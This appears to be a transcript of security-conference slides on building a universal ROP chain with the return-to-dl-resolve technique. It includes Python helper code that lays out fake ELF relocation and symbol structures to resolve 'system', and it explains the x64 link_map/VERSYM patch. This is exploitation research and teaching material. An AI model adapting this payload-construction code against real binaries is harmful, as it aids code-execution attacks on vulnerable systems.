2. ABOUT ME
• inaz2
• http://twitter.com/inaz2
• Security engineer & Python programmer
• AVTOKYO 2014 & 2015 speaker
• Weblog: Momoiro Technology
• http://inaz2.hatenablog.com/
• Written in Japanese but Google Translate will help us
3. LOW LAYER AND ME
• Got into it at Plaid CTF 2013 (the year of ropasaurusrex)
• Have spent 3 years trying to understand exploitation
• “ROP Illmatic: Exploring Universal ROP on glibc x86-64”
(AVTOKYO 2014)
• Introduced the Return-to-dl-resolve technique
• Introduced JIT-ROP techniques on Linux
• Wrote the “roputils” library for writing stable exploit code
• “Abusing Interrupts for Reliable Windows Kernel Exploitation”
(AVTOKYO 2015)
• Verified that IDT overwrite techniques still work on 32-bit Windows
9. SAYONARA ROP CHAIN
• https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/
• Universal ASLR & NX/DEP bypass on Windows x86
• Uses gadgets from non-ASLR DLLs
• Metasploit also generates its own variant with generate_rop_payload()
11. TRYING TO MAKE A LINUX VERSION
• The Return-to-dl-resolve technique works on x86 Linux (without PIE)
1. Send crafted relocation and symbol structures to a fixed writable address (the .bss section etc.)
2. Call them via dl-resolve@plt with adjusted arguments (the relocation offset and the function arguments on the stack)
• No stack pivot is needed
13. BUT IT WON’T WORK ON X64
• On x64 Linux, the code section and data section are not adjacent
• Code at 0x400000, data at 0x600000, so a fake symbol placed in .bss gets a huge index relative to SYMTAB
• The symbol version check is enabled by default
• Looking up VERSYM with that index reads unmapped memory and raises SEGV
• We need to read the link_map pointer from the GOT and overwrite
[link_map+0x1c8] (l_info[DT_VERSYM]) with 0 so that the version check is skipped
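The two slides above describe the .bss layout and the x64 version-check problem without numbers. The following is an added example (written for this page; it is not the slides' own code and not taken from roputils) that lays out the fake Elf_Rel(a)/Elf_Sym/name triple for both architectures and computes the address that `_dl_fixup` reads from the VERSYM table, so the contrast between x86 (read stays inside the mapped text segment) and x64 (read lands far outside it) is visible. All section addresses and the text-segment range are constructed for a hypothetical non-PIE binary; in practice they come from `readelf -d` and `readelf -l`. The `versym_info_offset` helper reproduces the 0x1c8 figure from the slide and takes DT_NUM as a parameter because later glibc versions added dynamic tags and moved the slot.

```python
"""Added example: fake-symbol layout for return-to-dl-resolve on x86 and x64,
plus the version-check sanity test that explains the SEGV on x64.
All addresses are constructed for a hypothetical non-PIE binary."""
import struct

R_JMP_SLOT = 7          # R_386_JMP_SLOT and R_X86_64_JUMP_SLOT are both 7
STT_FUNC_GLOBAL = 0x12  # (STB_GLOBAL << 4) | STT_FUNC

# Constructed values (hypothetical binaries): DT_JMPREL, DT_SYMTAB, DT_STRTAB,
# DT_VERSYM, the mapped text segment and a free .bss address.
X86 = dict(bits=32, jmprel=0x08048298, symtab=0x080481cc, strtab=0x0804822c,
           versym=0x08048284, text=(0x08048000, 0x08049000), bss=0x0804a020)
X64 = dict(bits=64, jmprel=0x4003f8, symtab=0x400298, strtab=0x400330,
           versym=0x4003a0, text=(0x400000, 0x401000), bss=0x601040)


def align_to(x, ref, n):
    """Smallest y >= x with y == ref (mod n): a fake table entry must sit an
    exact multiple of the entry size away from the real table base."""
    return ref + -(-(x - ref) // n) * n


def dl_resolve_layout(t, name):
    """Place fake reloc, fake symbol, symbol name and a slot that receives the
    resolved address, starting at t['bss']; return what a chain needs."""
    name = name.encode()
    if t["bits"] == 32:
        relent, syment, sym_shift = 8, 16, 8     # Elf32_Rel, Elf32_Sym, ELF32_R_SYM
    else:
        relent, syment, sym_shift = 24, 24, 32   # Elf64_Rela, Elf64_Sym, ELF64_R_SYM
    addr_reloc = align_to(t["bss"], t["jmprel"], relent)
    addr_sym = align_to(addr_reloc + relent, t["symtab"], syment)
    addr_name = addr_sym + syment
    addr_slot = align_to(addr_name + len(name) + 1, 0, 8)  # *(l_addr + r_offset) = value
    sym_index = (addr_sym - t["symtab"]) // syment
    r_info = (sym_index << sym_shift) | R_JMP_SLOT
    st_name = addr_name - t["strtab"]

    blob = bytearray(addr_slot + 8 - addr_reloc)   # zero-filled; slot stays 0

    def put(addr, data):
        blob[addr - addr_reloc:addr - addr_reloc + len(data)] = data

    if t["bits"] == 32:
        put(addr_reloc, struct.pack("<II", addr_slot, r_info))
        put(addr_sym, struct.pack("<IIIBBH", st_name, 0, 0, STT_FUNC_GLOBAL, 0, 0))
        reloc_arg = addr_reloc - t["jmprel"]              # x86: byte offset into .rel.plt
    else:
        put(addr_reloc, struct.pack("<QQq", addr_slot, r_info, 0))
        put(addr_sym, struct.pack("<IBBHQQ", st_name, STT_FUNC_GLOBAL, 0, 0, 0, 0))
        reloc_arg = (addr_reloc - t["jmprel"]) // relent  # x86-64: index into .rela.plt
    put(addr_name, name + b"\0")

    # _dl_fixup: ndx = vernum[ELFW(R_SYM)(r_info)] & 0x7fff, vernum = ElfW(Half)[] at DT_VERSYM
    versym_read = t["versym"] + 2 * sym_index
    lo, hi = t["text"]
    return dict(addr_reloc=addr_reloc, reloc_arg=reloc_arg, sym_index=sym_index,
                addr_slot=addr_slot, blob=bytes(blob), versym_read=versym_read,
                versym_mapped=lo <= versym_read < hi)


def versym_info_offset(dt_num=34):
    """64-bit offset of link_map.l_info[VERSYMIDX(DT_VERSYM)]: eight pointer-sized
    fields precede l_info, and VERSYMIDX(DT_VERSYM) = DT_NUM + DT_THISPROCNUM (0)
    + (DT_VERNEEDNUM - DT_VERSYM) = DT_NUM + 15.  DT_NUM = 34 gives 0x1c8, the
    value on the slide; newer glibc defines more tags, so pass its DT_NUM."""
    return 8 * 8 + (dt_num + 15) * 8


if __name__ == "__main__":
    for t in (X86, X64):
        r = dl_resolve_layout(t, "system")
        print("%d-bit: reloc_arg=%#x sym_index=%#x versym read @ %#x mapped=%s"
              % (t["bits"], r["reloc_arg"], r["sym_index"], r["versym_read"], r["versym_mapped"]))
    print("l_info[DT_VERSYM] at link_map+%#x" % versym_info_offset())
```

With these constructed addresses the x86 symbol index is 486 and the VERSYM read stays inside the text mapping, while the x64 index is 87529 and the read lands at 0x42af72, well past the end of the 0x400000 segment; that is the SEGV the slide describes, and clearing the l_info[DT_VERSYM] slot is what makes `_dl_fixup` skip the read entirely.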
15. RECAP
• I tried to make a universal ROP chain for Linux
• For x86, it succeeded with the return-to-dl-resolve technique
• But for x64, we have to traverse link_map and patch it
• Heavy task for ROP… Game Over \(^o^)/
16. REFERENCE
• Advanced return-into-lib(c) exploits (PaX case study) (Phrack 58)
• http://phrack.org/issues/58/4.html
• Return to Dynamic Linker (Codegate 2014 Junior)
• http://www.codegate.org/content/board/post_list.php?bid=48&q=Return+to+Dynamic+Linker
• How the ELF Ruined Christmas (USENIX Security 2015)
• https://www.usenix.org/conference/usenixsecurity15/technical-sessions/presentation/di-frederico